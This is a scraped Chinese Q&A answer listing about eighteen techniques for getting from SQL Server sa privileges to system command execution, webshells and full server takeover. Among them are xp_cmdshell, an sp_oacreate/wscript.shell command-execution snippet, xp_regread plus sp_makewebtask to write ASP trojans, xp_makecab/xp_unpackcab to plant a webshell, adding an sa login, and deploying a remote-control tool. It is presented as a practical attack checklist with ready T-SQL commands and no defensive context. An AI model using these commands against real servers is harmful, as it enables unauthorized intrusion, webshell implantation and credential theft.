今天看啥
热点:

最佳答案

1。xp_cmdshell执行命令

2。OAcreate

3。JOB

4。xp_regread读web路径 上传asp木马

5。xp_regread读web路径 用sp_makewebtask生成一句话木马

6。差异备份

7。爆数据 进后台

8。declare @shell int exec sp_oacreate 'wscrīpt.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c 命令'-- 执行命令

9。沙盒工具

10。openrowset命令连接本机测试sa若口令

11。bcp写文件

12。bulk insert读取conn.asp 拿SA密码~

13。利用sp_addlogin加一个sa用户进数据库

14。把注册表里沙盒的开关打开,找一个ACC注入点用岁月的工具执行命令

15。 都要有sa权限或者master库的db权限
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp' 打包

EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp' 解包,可以用于得到webshell

EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp' 读cmd的内容

16。exec master..xp_servicecontrol 'start','SQLSERVERAGENT' 开SQLSERVERAGENT服务
利用sp_add_job,sp_add_jobstep,sp_add_jobserver,sp_start_job,sp_addtask这些存储过

程可以得到webshell或者系统权限

17。openrowset 命令连接ACCESS数据库 实现跨库查询! 要知道ACCESS数据库的绝对路径 还要有SA权限
工具不行就试手工

18。丢个远控上去直接执行

回答者:

www.bkjia.comtruehttp://www.bkjia.com/anquan/anquan20135.htmlTechArticle最佳答案 1。xp_cmdshell执行命令 2。OAcreate 3。JOB 4。xp_regread读web路径 上传asp木马 5。xp_regread读web路径 用sp_makewebtask生成一句话木马 6。差异备份 7。爆数据 进后台 8。declare @shell int exec...

相关文章

相关搜索: sa权限
相关频道:

帮客评论

视觉看点